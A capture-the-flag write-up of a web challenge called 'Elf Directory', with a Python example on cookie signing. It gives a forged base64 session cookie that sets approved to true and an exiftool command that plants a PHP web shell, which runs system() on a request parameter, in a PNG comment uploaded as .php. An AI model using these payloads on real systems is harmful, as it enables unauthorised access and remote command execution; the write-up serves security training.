
Day 4: Elf Directory

Challenge description:
Can you infiltrate the Elf Directory to get a foothold inside Santa's data warehouse in the North Pole?


No source code this time. Let's poke at the application!

We are presented with a way to register and login. Upon login, we are informed that only authorised personnel can edit their profile... So sad.


Contact the admin elf? Ain't my username admin already? There must be a way the application is checking the status.


To maintain state, it seems to use a PHP session cookie. The value looks decodable, so let's decode it in CyberChef.


Hmm... What if I change the value of approved to true and replace the cookie with eyJ1c2VybmFtZSI6ImFkbWluIiwiYXBwcm92ZWQiOnRydWV9?
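The cookie check above, seen from the defender's side as an added Python example (not the challenge's own code): the first parser does what the application appears to do, trusting the base64 JSON exactly as the client sends it, while the second issues and verifies an HMAC-signed cookie so that a flipped approved flag is rejected. The signing key and the exact cookie field names are assumptions.

```python
import base64
import hashlib
import hmac
import json

# Constructed from the write-up: base64 of {"username":"admin","approved":true}.
TAMPERED_COOKIE = "eyJ1c2VybmFtZSI6ImFkbWluIiwiYXBwcm92ZWQiOnRydWV9"


def encode_plain_cookie(payload: dict) -> str:
    """Unsigned cookie, as the challenge app appears to issue it."""
    raw = json.dumps(payload, separators=(",", ":")).encode()
    return base64.b64encode(raw).decode()


def parse_cookie_insecure(cookie: str) -> dict:
    """Trusts client-controlled state: anyone can rewrite 'approved'."""
    return json.loads(base64.b64decode(cookie))


def issue_signed_cookie(payload: dict, key: bytes) -> str:
    """Append an HMAC-SHA256 tag computed over the encoded body."""
    body = encode_plain_cookie(payload)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def parse_signed_cookie(cookie: str, key: bytes):
    """Return the payload only if the tag matches; None on any tampering."""
    body, sep, tag = cookie.rpartition(".")
    if not sep or not body:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    # Constant-time compare so the tag cannot be guessed byte by byte.
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(base64.b64decode(body))


if __name__ == "__main__":
    key = b"server-side-secret-placeholder"  # assumption: loaded from config
    print(parse_cookie_insecure(TAMPERED_COOKIE))  # insecure parser accepts it
    good = issue_signed_cookie({"username": "admin", "approved": False}, key)
    print(parse_signed_cookie(good, key))
    forged = TAMPERED_COOKIE + "." + good.split(".")[1]
    print(parse_signed_cookie(forged, key))  # None: tag no longer matches
```

Even a signed cookie still leaks its contents, so the more robust design keeps the approval flag in server-side session storage and hands the client only an opaque session identifier.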


New upload functionality! Poking around, it strictly only accepts PNG image content. No filename tricks here...

However, it does accept a filename of <name>.php, so let's put the PHP script inside an actual PNG, in the image metadata as a comment.

exiftool -Comment="<?php if(isset(\$_REQUEST['cmd'])){ echo \"<pre>\"; \$cmd = (\$_REQUEST['cmd']); system(\$cmd); echo \"</pre>\"; die; }?>" test.png

Next, before sending the image, we modify the filename in either Burp Suite or Firefox DevTools.

Now, we can browse to the image!


Voilà. Now we just have to find the flag.